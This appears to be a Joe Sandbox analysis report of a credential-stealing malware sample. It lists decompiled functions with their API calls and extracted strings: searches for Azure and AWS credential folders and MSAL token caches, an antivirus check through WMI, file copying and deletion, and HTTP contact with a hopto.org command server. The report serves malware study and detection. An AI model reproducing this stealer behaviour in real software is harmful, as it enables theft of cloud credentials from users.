                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        • _memset.LIBCMT ref: 004165CA
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                        • _memset.LIBCMT ref: 0041663E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                        • API String ID: 4216275855-974132213
                                                                                                        • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                        • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                        • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                        • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                        Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                        • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                        • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                        • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                        • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                        • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                        • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 1956182324-0
                                                                                                        • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                        • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                        • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                        • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                        Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                          • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                          • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                          • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                          • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                          • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                          • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                          • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                          • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                          • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                          • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                          • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                          • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                          • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                          • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                          • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$cowod.$e90840a846d017e7b095f7543cdf2d15$hopto$http://$org
                                                                                                        • API String ID: 305159127-1328715557
                                                                                                        • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                        • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                        • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                        • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                        Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strtok_s.MSVCRT ref: 004135EA
                                                                                                        • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                        • strtok_s.MSVCRT ref: 0041398F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2116072422-2658103896
                                                                                                        • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                        • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                        • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                        • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                        Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                        • String ID: GET$\xA
                                                                                                        • API String ID: 442264750-571280152
                                                                                                        • Opcode ID: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
                                                                                                        • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                        • Opcode Fuzzy Hash: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
                                                                                                        • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                        Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                          • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                          • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                        • API String ID: 4288110179-315474579
                                                                                                        • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                        • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                        • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                        • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                        Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004012A7
                                                                                                        • _memset.LIBCMT ref: 004012B6
                                                                                                        • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                        • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                        • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                        • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                        • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                        • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                        • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                        • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                        • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                        • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                          • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                        • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                        • String ID:
                                                                                                        • API String ID: 1553874529-0
                                                                                                        • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                        • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                        • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                        • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
